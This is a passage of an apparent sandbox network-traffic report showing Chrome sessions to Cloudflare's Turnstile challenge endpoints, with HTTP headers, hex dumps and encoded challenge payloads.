                                                          Data Ascii: VaiDV+NeNXDq0iLNTNxNENJvhvVeN-Ne5iAV10+0RSV1NC0Vn0ENevqGVo+fvXkV4NNvVsVyNvDi0NsvYDqSNXNeNhIN0No0+yVor55qNVi0YNi1VA0RNiE0oEY8irapNoNisNp0eNRaVNDV0QLivNA0tNVjidt3ONPDkJE5V5Lr0rTR$5f8GSNONePX7dPL+0tvjIaRioPa8XuyRDjp7qHbtaOmRHUPac7VlDuyHs5CBj5MGkCmqyp0$TRLN0z
                                                          2025-01-09 20:12:21 UTC322INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:21 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 26300
                                                          Connection: close
                                                          cf-chl-gen: 01cmG2CWSZIobIlYIraOdNYRjEQk8+1qwha8ZwZItbiNVE0kvC1oPUMA4tM5rFlD$wfjjstXO4Ueiv0/NcS6blQ==
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714e8fbf8c445-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:21 UTC1047INData Raw: 6f 62 2b 68 6c 73 47 2b 76 37 71 2f 68 72 2b 38 78 63 65 6c 7a 4b 32 49 6a 71 65 52 69 4b 65 72 6c 5a 72 63 76 4b 65 65 33 4a 65 67 75 4e 76 67 77 64 53 33 78 71 6a 58 32 4e 61 6d 6f 4d 4c 70 36 38 37 74 77 61 37 4d 7a 75 57 32 35 73 72 64 75 50 72 77 41 62 79 38 2f 4e 55 42 32 2b 4c 6a 77 4e 63 41 2f 65 50 4c 35 42 41 46 43 52 44 73 41 2f 55 51 44 50 45 4b 36 74 4c 63 35 68 58 61 38 51 34 65 32 68 72 66 49 79 6f 57 48 79 54 39 44 43 67 6f 2b 6a 49 4e 4c 53 6b 42 4e 43 59 4b 39 68 4d 55 42 65 38 48 45 42 45 4d 48 42 73 65 47 76 67 54 52 42 4d 35 4f 51 6b 70 46 7a 67 63 4d 6a 45 64 54 51 68 4d 4a 55 73 57 53 30 51 5a 53 68 30 32 50 57 4d 78 49 79 31 42 4d 6a 42 69 50 44 5a 49 4a 6b 41 6d 52 47 35 46 59 30 78 57 58 30 30 7a 64 6a 46 56 55 46 42 4e 56 6c 56
                                                          Data Ascii: ob+hlsG+v7q/hr+8xcelzK2IjqeRiKerlZrcvKee3JeguNvgwdS3xqjX2NamoMLp687twa7MzuW25srduPrwAby8/NUB2+LjwNcA/ePL5BAFCRDsA/UQDPEK6tLc5hXa8Q4e2hrfIyoWHyT9DCgo+jINLSkBNCYK9hMUBe8HEBEMHBseGvgTRBM5OQkpFzgcMjEdTQhMJUsWS0QZSh02PWMxIy1BMjBiPDZIJkAmRG5FY0xWX00zdjFVUFBNVlV
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 57 79 61 43 75 70 5a 43 6a 31 74 33 48 31 4d 69 7a 34 74 37 61 33 36 61 67 70 65 43 6e 6f 64 58 64 32 36 48 44 35 64 76 43 33 37 36 31 73 4d 48 4e 74 74 4b 37 37 63 69 37 76 39 37 75 32 66 37 7a 2f 4e 72 44 77 64 76 61 39 74 37 4d 35 66 73 49 41 76 51 54 33 39 4c 76 45 65 67 48 31 75 7a 70 43 78 33 37 31 79 48 33 34 78 49 47 46 76 72 69 43 52 58 38 4b 76 73 65 4d 50 6f 6e 4a 2f 4d 68 45 43 77 4d 44 51 6b 51 4f 6a 63 38 51 52 34 6a 44 54 34 53 46 44 73 52 45 68 4d 59 4b 42 74 41 53 46 41 6b 48 51 31 47 50 55 30 78 53 44 67 71 4c 30 68 63 57 68 31 58 54 7a 41 30 56 6c 4d 37 49 55 56 6f 4b 44 6f 6e 4a 6d 70 47 4b 79 4e 4c 62 58 46 43 62 55 31 70 56 58 59 32 62 69 38 33 55 44 78 51 55 6e 39 54 65 6a 31 53 64 33 56 6f 57 30 56 38 58 6d 75 4e 66 6e 43 54 58 49
                                                          Data Ascii: WyaCupZCj1t3H1Miz4t7a36agpeCnodXd26HD5dvC3761sMHNttK77ci7v97u2f7z/NrDwdva9t7M5fsIAvQT39LvEegH1uzpCx371yH34xIGFvriCRX8KvseMPonJ/MhECwMDQkQOjc8QR4jDT4SFDsREhMYKBtASFAkHQ1GPU0xSDgqL0hcWh1XTzA0VlM7IUVoKDonJmpGKyNLbXFCbU1pVXY2bi83UDxQUn9Tej1Sd3VoW0V8XmuNfnCTXI
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 31 39 54 61 6d 4e 66 5a 75 4b 7a 58 7a 65 61 6b 30 64 62 6f 32 65 48 6a 76 64 79 34 71 38 4f 2b 7a 74 44 47 34 50 54 76 39 62 4c 6d 74 76 48 31 34 65 4c 54 2f 4d 50 58 78 51 66 42 77 51 50 46 43 67 7a 32 32 78 44 72 34 77 59 52 7a 67 51 58 46 75 58 57 48 4e 6e 75 2b 50 6b 59 32 75 2f 72 47 53 4c 63 42 76 33 62 2f 65 76 34 4c 42 6f 70 4a 68 4d 52 4a 42 30 6e 44 68 49 6f 38 77 54 31 47 78 62 35 4d 41 73 78 4f 50 73 4e 46 42 56 48 53 55 51 42 48 41 51 4c 51 43 45 67 50 44 35 52 55 52 49 66 55 31 6f 71 4c 44 77 2b 4c 45 70 63 51 6c 5a 42 4d 55 59 76 4d 54 78 67 4f 7a 6b 71 4a 6d 4e 73 51 47 6c 54 4d 47 42 76 4d 6a 4e 48 53 56 4a 74 61 54 78 62 56 45 39 67 53 33 64 56 63 30 4b 41 51 57 61 43 53 57 6d 45 5a 33 6c 73 67 57 31 75 67 59 4a 32 69 59 53 4b 69 46 4e
                                                          Data Ascii: 19TamNfZuKzXzeak0dbo2eHjvdy4q8O+ztDG4PTv9bLmtvH14eLT/MPXxQfBwQPFCgz22xDr4wYRzgQXFuXWHNnu+PkY2u/rGSLcBv3b/ev4LBopJhMRJB0nDhIo8wT1Gxb5MAsxOPsNFBVHSUQBHAQLQCEgPD5RURIfU1oqLDw+LEpcQlZBMUYvMTxgOzkqJmNsQGlTMGBvMjNHSVJtaTxbVE9gS3dVc0KAQWaCSWmEZ3lsgW1ugYJ2iYSKiFN
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 37 2b 38 7a 39 76 65 6d 73 4f 35 74 4f 61 39 34 75 61 6f 71 72 36 38 72 75 66 70 37 75 76 68 78 38 54 4c 78 66 44 32 33 4c 72 2b 30 64 54 66 41 50 54 79 38 74 67 46 37 4f 50 38 42 2b 51 44 2b 74 41 46 43 2b 4d 4f 41 39 49 53 2f 41 6a 37 38 75 6f 42 33 69 54 72 32 78 41 51 2b 43 6f 55 4a 41 6b 72 41 2f 77 50 4d 52 33 2b 36 51 73 65 42 43 6b 58 4e 41 67 72 44 66 77 76 46 7a 34 32 2b 41 46 47 48 44 6b 62 41 78 63 65 48 44 56 43 43 77 31 4d 53 52 39 4a 55 52 55 72 57 56 55 55 53 42 55 32 48 44 51 39 55 57 45 30 50 52 77 33 57 57 6b 37 4a 32 77 39 52 44 30 2b 61 32 56 64 63 6b 5a 6b 54 47 6b 7a 61 31 6c 57 53 45 68 48 53 33 42 70 59 6f 4e 77 52 56 6c 36 65 6f 52 35 59 58 56 36 5a 33 31 63 68 6c 70 69 69 32 42 74 69 6d 43 53 6b 31 65 51 54 33 53 53 65 48 69 53
                                                          Data Ascii: 7+8z9vemsO5tOa94uaoqr68rufp7uvhx8TLxfD23Lr+0dTfAPTy8tgF7OP8B+QD+tAFC+MOA9IS/Aj78uoB3iTr2xAQ+CoUJAkrA/wPMR3+6QseBCkXNAgrDfwvFz42+AFGHDkbAxceHDVCCw1MSR9JURUrWVUUSBU2HDQ9UWE0PRw3WWk7J2w9RD0+a2VdckZkTGkza1lWSEhHS3BpYoNwRVl6eoR5YXV6Z31chlpii2BtimCSk1eQT3SSeHiS
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 69 37 30 2b 48 67 7a 64 37 6a 7a 39 47 76 33 74 33 66 79 64 4c 54 75 76 44 45 2b 39 66 39 73 73 37 65 38 4e 62 30 76 66 37 63 30 73 45 4d 33 2f 37 61 43 75 49 4f 35 52 50 72 44 2b 58 67 34 4e 50 34 43 68 72 77 32 50 7a 33 32 41 76 65 46 68 4d 66 46 53 59 70 46 67 30 4d 4b 41 38 73 36 51 73 52 45 76 30 77 38 54 41 79 45 43 4d 34 46 67 6f 72 4d 68 7a 33 4e 50 6f 77 39 30 4d 37 49 54 77 7a 4c 43 70 45 46 78 6b 4b 50 77 30 30 42 30 4d 72 49 77 74 58 4f 68 59 58 57 56 55 2f 46 31 39 68 4e 43 51 38 56 46 51 70 49 44 35 68 4f 6c 70 6b 5a 44 34 6b 58 43 73 2b 59 6b 4a 5a 52 6c 46 34 64 54 6c 74 55 6d 31 41 4e 48 69 46 54 56 31 34 61 44 74 4b 68 49 6f 2f 5a 49 78 47 54 59 35 62 59 6c 31 4d 69 49 4e 6a 6d 57 4e 6b 5a 56 43 5a 63 31 32 67 64 70 56 78 6f 33 74 35 64
                                                          Data Ascii: i70+Hgzd7jz9Gv3t3fydLTuvDE+9f9ss7e8Nb0vf7c0sEM3/7aCuIO5RPrD+Xg4NP4Chrw2Pz32AveFhMfFSYpFg0MKA8s6QsREv0w8TAyECM4FgorMhz3NPow90M7ITwzLCpEFxkKPw00B0MrIwtXOhYXWVU/F19hNCQ8VFQpID5hOlpkZD4kXCs+YkJZRlF4dTltUm1ANHiFTV14aDtKhIo/ZIxGTY5bYl1MiINjmWNkZVCZc12gdpVxo3t5d
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 69 78 4b 7a 47 33 39 62 49 30 2b 57 7a 36 73 54 34 7a 63 6a 62 37 4f 44 39 39 76 48 37 38 75 50 70 36 50 37 56 2b 73 76 4c 35 51 37 51 45 38 58 4d 31 66 48 77 47 52 44 59 34 78 76 79 2b 66 33 58 48 4f 44 7a 46 69 41 62 41 43 59 55 4a 75 4d 66 4a 51 6a 6c 48 51 49 42 37 69 4d 48 45 50 4d 6c 38 68 6a 74 4c 50 6b 59 4d 79 30 69 46 51 39 43 50 41 55 59 53 52 38 56 48 67 55 4e 42 53 78 4e 4a 7a 38 4b 56 69 6b 55 4d 46 5a 45 56 68 52 50 56 54 67 57 54 54 49 78 48 31 4d 33 51 43 52 56 49 30 67 65 58 43 70 49 59 31 31 53 52 54 39 79 63 56 4a 55 4d 48 42 7a 55 6e 31 53 63 46 38 35 56 58 52 66 68 6b 51 35 52 58 74 64 52 56 39 34 62 32 46 73 66 6b 79 44 58 5a 46 6d 59 58 53 46 65 5a 61 50 69 70 53 4c 66 49 4b 42 6c 32 36 54 5a 47 57 48 59 58 35 6f 66 70 36 6f 6f 49
                                                          Data Ascii: ixKzG39bI0+Wz6sT4zcjb7OD99vH78uPp6P7V+svL5Q7QE8XM1fHwGRDY4xvy+f3XHODzFiAbACYUJuMfJQjlHQIB7iMHEPMl8hjtLPkYMy0iFQ9CPAUYSR8VHgUNBSxNJz8KVikUMFZEVhRPVTgWTTIxH1M3QCRVI0geXCpIY11SRT9ycVJUMHBzUn1ScF85VXRfhkQ5RXtdRV94b2FsfkyDXZFmYXSFeZaPipSLfIKBl26TZGWHYX5ofp6ooI
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 7a 72 43 33 38 39 71 7a 30 62 54 61 75 4d 44 41 34 4c 76 77 37 2b 55 46 42 66 66 69 44 67 6e 5a 35 38 66 6d 41 50 48 4c 31 51 50 55 30 4f 34 49 39 4e 4d 4a 43 50 76 58 39 67 4c 2b 33 42 38 67 42 4e 38 6c 41 67 51 75 37 51 59 49 36 43 30 53 44 54 45 78 45 68 48 77 4a 53 51 57 50 6a 6b 57 46 2f 67 58 4c 77 48 38 47 67 55 6b 41 55 55 71 4b 67 55 6a 49 69 38 4a 45 45 77 78 44 53 73 75 4c 78 42 46 4f 6a 70 65 57 55 67 2b 58 56 31 43 51 52 78 68 50 6b 45 67 50 7a 35 46 4a 46 6c 62 4c 53 6c 64 53 6c 4d 73 53 32 42 51 4d 44 6b 35 57 7a 52 6e 65 46 30 34 56 32 78 69 50 58 46 65 5a 49 71 46 64 47 61 4a 69 57 4a 75 6b 6c 4a 6d 62 30 79 42 68 47 39 52 6c 45 31 5a 56 58 4e 75 65 31 69 64 66 6f 46 64 6b 58 71 43 70 61 56 2b 69 57 57 70 69 6f 78 6f 6e 59 4b 52 62 4b 2b
                                                          Data Ascii: zrC389qz0bTauMDA4Lvw7+UFBffiDgnZ58fmAPHL1QPU0O4I9NMJCPvX9gL+3B8gBN8lAgQu7QYI6C0SDTExEhHwJSQWPjkWF/gXLwH8GgUkAUUqKgUjIi8JEEwxDSsuLxBFOjpeWUg+XV1CQRxhPkEgPz5FJFlbLSldSlMsS2BQMDk5WzRneF04V2xiPXFeZIqFdGaJiWJuklJmb0yBhG9RlE1ZVXNue1idfoFdkXqCpaV+iWWpioxonYKRbK+
                                                          2025-01-09 20:12:21 UTC1369INData Raw: 37 43 38 34 50 57 36 38 65 7a 44 75 4d 54 6d 33 51 62 36 43 51 45 41 34 67 54 36 7a 76 4d 52 45 66 44 4e 41 65 72 34 7a 66 72 77 47 50 37 59 43 2b 49 61 47 41 2f 69 43 43 55 6c 42 67 67 71 36 79 62 6f 4d 65 30 4e 35 52 4d 4a 4c 69 51 33 42 2f 6f 79 4f 6a 48 30 43 43 45 67 4d 6a 42 44 46 42 58 39 52 67 68 43 4c 45 30 47 53 77 30 76 45 55 34 38 55 55 6c 51 4b 7a 68 44 55 6b 64 64 47 6a 6b 53 51 44 56 61 52 57 49 6b 58 6c 4a 70 49 68 30 70 54 43 31 71 58 47 31 6c 4d 55 64 56 58 32 35 6e 65 54 5a 56 4c 6c 74 6e 64 6a 6c 2b 50 58 35 33 62 6e 46 6f 67 59 6c 47 5a 54 35 74 64 34 61 44 65 6e 31 30 6a 5a 4a 55 6a 6f 75 43 68 59 61 56 6e 56 70 35 55 6f 43 62 6d 70 65 4f 6b 5a 4b 68 70 6d 69 69 6e 35 61 5a 69 4b 6d 78 62 6f 31 6d 6c 48 53 75 71 36 4b 6c 6c 4c 57 36
                                                          Data Ascii: 7C84PW68ezDuMTm3Qb6CQEA4gT6zvMREfDNAer4zfrwGP7YC+IaGA/iCCUlBggq6yboMe0N5RMJLiQ3B/oyOjH0CCEgMjBDFBX9RghCLE0GSw0vEU48UUlQKzhDUkddGjkSQDVaRWIkXlJpIh0pTC1qXG1lMUdVX25neTZVLltndjl+PX53bnFogYlGZT5td4aDen10jZJUjouChYaVnVp5UoCbmpeOkZKhpmiin5aZiKmxbo1mlHSuq6KllLW6


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.449770104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:22 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:22 UTC375INHTTP/1.1 404 Not Found
                                                          Date: Thu, 09 Jan 2025 20:12:22 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 7
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: 3RbBSgU7UnWZSmipOVB4CA==$WJBZVGu/hZMWAxkYdRIDrQ==
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714f0d8ff72ab-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:22 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                          Data Ascii: invalid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.449771104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:29 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 34590
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 0
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:29 UTC16384OUTData Raw: 76 5f 38 66 66 37 31 34 63 38 66 62 32 37 63 33 32 35 3d 34 54 35 30 6f 69 56 49 4c 4f 54 4e 54 4e 73 54 56 25 32 62 56 4f 6b 76 69 47 41 68 47 69 51 4e 4d 30 72 41 52 53 4e 44 30 65 54 4e 49 4e 61 30 51 41 2b 56 51 4e 58 48 30 71 4c 69 69 4e 7a 71 55 4e 52 76 30 4e 74 47 76 52 70 6f 4e 71 41 4e 24 52 4e 2b 61 4e 6a 6f 58 54 30 69 4e 71 4b 75 6b 4f 59 30 68 4d 70 4e 75 6f 48 2b 64 35 41 65 30 68 41 56 4e 59 44 69 59 4e 51 76 69 55 73 55 51 75 4e 4e 75 4e 65 4c 4e 4d 68 31 33 30 30 4e 52 71 4e 4e 42 70 4e 4e 34 48 35 63 67 69 4c 4e 71 47 4c 24 58 46 50 55 6f 4e 52 5a 71 4c 4a 64 53 37 68 74 4e 56 74 55 71 48 64 64 65 47 4c 44 4e 4f 2d 4f 64 69 2b 46 69 2b 6a 44 4e 35 75 73 49 30 30 73 31 39 4c 44 49 4c 6b 69 74 24 6b 66 4e 74 39 66 67 43 4a 67 6e 59 4b 78
                                                          Data Ascii: v_8ff714c8fb27c325=4T50oiVILOTNTNsTV%2bVOkviGAhGiQNM0rARSND0eTNINa0QA+VQNXH0qLiiNzqUNRv0NtGvRpoNqAN$RN+aNjoXT0iNqKukOY0hMpNuoH+d5Ae0hAVNYDiYNQviUsUQuNNuNeLNMh1300NRqNNBpNN4H5cgiLNqGL$XFPUoNRZqLJdS7htNVtUqHddeGLDNO-Odi+Fi+jDN5usI00s19LDILkit$kfNt9fgCJgnYKx
                                                          2025-01-09 20:12:29 UTC16384OUTData Raw: 56 61 69 44 56 2b 4e 65 4e 58 44 71 30 69 4c 4e 54 4e 78 4e 45 4e 4a 76 68 76 56 65 4e 2d 4e 65 35 69 41 56 31 30 2b 30 52 53 56 31 4e 43 30 56 6e 30 45 4e 65 76 71 47 56 6f 2b 66 76 58 6b 56 34 4e 4e 76 56 73 56 79 4e 76 44 69 30 4e 73 76 59 44 71 53 4e 58 4e 65 4e 68 49 4e 30 4e 6f 30 2b 79 56 6f 72 35 35 71 4e 56 69 30 59 4e 69 31 56 41 30 52 4e 69 45 30 6f 45 59 38 69 72 61 70 4e 6f 4e 69 73 4e 70 30 65 4e 52 61 56 4e 44 56 30 51 4c 69 76 4e 41 30 74 4e 56 6a 69 64 74 33 4f 4e 50 44 6b 4a 45 35 56 35 4c 72 30 72 54 52 24 35 66 38 47 53 4e 4f 4e 65 50 58 37 64 50 4c 2b 30 74 76 6a 49 61 52 69 6f 50 61 38 58 75 79 52 44 6a 70 37 71 48 62 74 61 4f 6d 52 48 55 50 61 63 37 56 6c 44 75 79 48 73 35 43 42 6a 35 4d 47 6b 43 6d 71 79 70 30 24 54 52 4c 4e 30 7a
                                                          Data Ascii: VaiDV+NeNXDq0iLNTNxNENJvhvVeN-Ne5iAV10+0RSV1NC0Vn0ENevqGVo+fvXkV4NNvVsVyNvDi0NsvYDqSNXNeNhIN0No0+yVor55qNVi0YNi1VA0RNiE0oEY8irapNoNisNp0eNRaVNDV0QLivNA0tNVjidt3ONPDkJE5V5Lr0rTR$5f8GSNONePX7dPL+0tvjIaRioPa8XuyRDjp7qHbtaOmRHUPac7VlDuyHs5CBj5MGkCmqyp0$TRLN0z
                                                          2025-01-09 20:12:29 UTC1822OUTData Raw: 51 65 30 52 7a 56 45 4e 35 36 69 73 56 65 30 6a 62 65 68 62 69 65 43 2b 34 76 56 62 61 70 46 4a 39 51 61 4e 6e 35 76 4a 55 55 47 70 30 56 44 4e 42 4e 4a 65 4a 75 4e 6a 24 53 67 72 7a 6d 6b 4e 51 35 4e 36 59 4f 6b 4a 76 71 47 45 45 4e 76 4b 4a 30 56 6b 4b 33 47 72 51 31 72 4e 35 53 57 24 48 4b 6b 79 58 53 51 4e 50 6e 32 42 58 74 2d 39 4e 6b 44 4e 4c 42 49 63 70 33 63 43 5a 56 6e 4d 2d 4d 38 6e 59 49 45 56 6a 56 44 38 24 7a 62 72 6d 2d 73 2b 6f 59 4b 48 2d 50 44 63 6b 58 65 6f 4f 4e 6e 54 58 4f 59 43 4e 4a 76 56 4c 56 6c 30 6e 63 34 6d 24 67 53 6d 51 70 74 70 73 4e 65 2d 4f 6d 53 49 68 72 44 4e 53 4e 30 59 31 72 34 76 4e 2d 4e 37 70 75 44 4e 55 34 46 4e 68 4a 56 52 61 70 6a 49 78 4e 7a 4e 70 33 51 54 51 2d 65 4b 69 50 49 56 6b 6b 6a 35 2b 33 33 4a 46 36 44
                                                          Data Ascii: Qe0RzVEN56isVe0jbehbieC+4vVbapFJ9QaNn5vJUUGp0VDNBNJeJuNj$SgrzmkNQ5N6YOkJvqGEENvKJ0VkK3GrQ1rN5SW$HKkyXSQNPn2BXt-9NkDNLBIcp3cCZVnM-M8nYIEVjVD8$zbrm-s+oYKH-PDckXeoONnTXOYCNJvVLVl0nc4m$gSmQptpsNe-OmSIhrDNSN0Y1r4vN-N7puDNU4FNhJVRapjIxNzNp3QTQ-eKiPIVkkj5+33JF6D
                                                          2025-01-09 20:12:29 UTC1347INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4624
                                                          Connection: close
                                                          cf-chl-out: BiOIrheKWgCCC/nnr1/nwx1N08PZyTDmdl9z/VtTlQh0G066+WfjWcx+qTasWJAQryPMALWQE28yeUr9eQXxYkMe0NQyooBpSLtVz7nF994=$reiYfULhJq03aPDHP9SiNw==
                                                          cf-chl-out-s: 8WSoxkkBfLqpAu/ILq7m8yJwJ89EETnMlLamqzdNwfvaj+zN5pEwNIaKvRaAzKSc7p0p0mZO5KQIVZNzMsbhkay6vU5ItKBOZ3quN4kuo9uTrjeo0MmAryWLb+kjl0FuQyknviPA62P0ier/UfHaGuQMl6OeMONN3yxr/Y60XuXg6AxRfexZYLopreSqpv0++5QV9rfFVXM0cT7RgMEckKUJZdKp3pP/uxbQ//YjPKVP2uspjtNvts6PazLrGi1PjtSJQZnpjf4KjcE4JarzjpUbl08eCnwRgYppNaJ4aLpfBXf7oR3k2mhwUYpTpUJTTnNSSLa1+yyLOYM4FsVuhunkPdDetBcIUeCnJHMIhZlHgHlw8OuXb47Fysd8/eJDDtbz2hyCuBEcwfJHHc5xYRiJVc7m7nQlkOKotuWtbdsgnzzZXSKGal3MhC++bMaFv1mw/gIqv40gjR5MuyJljKELkGQZZMA4yw8xDz8WUeUbSeebXb90U7hGhP/lExSXULt+s3205Uhpg3DJ72wyfJFVABnQKanbXSJXO5N4Z3JSdqqxmd9aoue7yAKWpaPcNQzXcR/8FC+flq++nATTPC4QW77aL7uPl+CMNRFXFAb7HBCe09JcqyxP24MlLW54L7nWe6iawdaoa28Zv5cezRs/eqwF0cLbxALq0NCKrOX/FfRJ33DtK1/9jqI/8cGb8Xod7cwUhRzOiwq2zCJQS6KItFO/Qmm7oUdcOAzmPXfW/2mQbeDUDahmDLIWZB62fJlqTzD5XUHC/CfgCVYGc6qsE/rmfbgSJdoi52YmkqPYsRRqcgYcrSUWiZErcRG3Nv87enPIJiSZHuE+xkzJQ7M42S0CvN4zJgaqG8JiOV7xIgPFxIFMZSuPQIcDqCIMhqLDBzbGwIHmUGzD1gV7hm8i6utilfr6JiJlpzgpQhqnfgqBMYHLlbfUGC/++qHvrNI95hKNRJ3Lh7NbN0ON3hEewxDu0hIVYoo6A9IEMMg=$VFVZR [TRUNCATED]
                                                          Server: cloudflare
                                                          2025-01-09 20:12:29 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 66 66 37 31 35 31 62 62 64 63 30 34 34 30 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                          Data Ascii: CF-RAY: 8ff7151bbdc04405-EWRalt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:29 UTC1329INData Raw: 6f 62 2b 68 6c 73 47 2b 76 37 71 2f 68 72 2b 38 78 63 65 6c 7a 4b 33 51 71 6f 75 52 77 38 44 48 6b 74 65 6d 31 4e 62 52 72 36 71 54 33 37 65 76 6f 4b 2b 37 36 61 61 6f 75 4c 2b 32 33 63 62 64 71 75 48 4b 34 62 48 4d 76 39 4f 30 72 50 7a 79 76 50 72 55 76 62 6e 54 2b 37 76 39 37 67 44 2b 2f 66 58 6c 42 41 51 51 44 41 4c 37 34 74 33 6e 42 39 4c 6c 36 67 59 54 2b 4f 62 70 47 77 6b 5a 33 50 67 52 33 65 54 37 49 74 34 65 35 42 66 69 48 67 34 66 45 53 55 55 41 67 59 6f 38 43 76 7a 4b 44 55 75 4e 66 6b 39 39 67 73 4e 4d 54 6b 7a 39 77 38 44 48 77 41 69 52 51 67 61 44 78 78 53 44 53 6f 54 48 52 4a 43 52 7a 45 30 4e 43 52 4b 58 52 74 67 4e 44 64 55 4f 32 59 7a 61 43 52 65 53 56 4d 32 57 47 45 73 63 47 64 64 4d 57 4a 6a 54 7a 52 42 55 44 42 44 58 45 74 47 56 44 64
                                                          Data Ascii: ob+hlsG+v7q/hr+8xcelzK3QqouRw8DHktem1NbRr6qT37evoK+76aaouL+23cbdquHK4bHMv9O0rPzyvPrUvbnT+7v97gD+/fXlBAQQDAL74t3nB9Ll6gYT+ObpGwkZ3PgR3eT7It4e5BfiHg4fESUUAgYo8CvzKDUuNfk99gsNMTkz9w8DHwAiRQgaDxxSDSoTHRJCRzE0NCRKXRtgNDdUO2YzaCReSVM2WGEscGddMWJjTzRBUDBDXEtGVDd
                                                          2025-01-09 20:12:29 UTC1369INData Raw: 6d 4b 71 70 5a 64 6d 61 36 61 62 62 6f 47 44 71 6e 47 71 71 35 69 76 6d 61 57 62 6a 72 4f 53 75 48 7a 43 76 72 65 6a 66 38 4f 79 6d 70 57 5a 75 71 2b 2f 78 63 57 66 7a 36 62 48 71 4d 4b 54 79 74 47 74 79 63 79 2f 79 70 37 4d 77 2b 4c 5a 31 74 72 6d 70 64 6d 6d 30 38 6a 64 34 39 72 73 32 2b 6e 52 33 64 33 70 38 75 76 74 31 2b 36 75 36 76 55 41 30 75 79 39 76 50 6a 38 76 77 54 6a 2f 63 4d 44 44 76 63 47 36 65 54 35 43 52 4d 56 41 64 45 54 45 67 6e 55 43 78 4d 53 32 42 4d 4a 45 68 67 43 2f 51 58 31 34 78 4d 56 49 75 67 57 49 65 67 6f 42 43 51 55 4b 2b 30 66 4c 79 41 5a 4b 6a 45 76 39 79 6e 36 4f 2f 34 73 49 68 59 64 51 44 6f 33 2b 6a 4a 42 4f 79 35 46 43 55 4d 2b 4d 7a 52 54 55 31 42 4c 4f 52 56 50 4f 31 4d 2b 50 78 6f 39 58 55 6f 65 49 45 39 62 4e 31 77 78
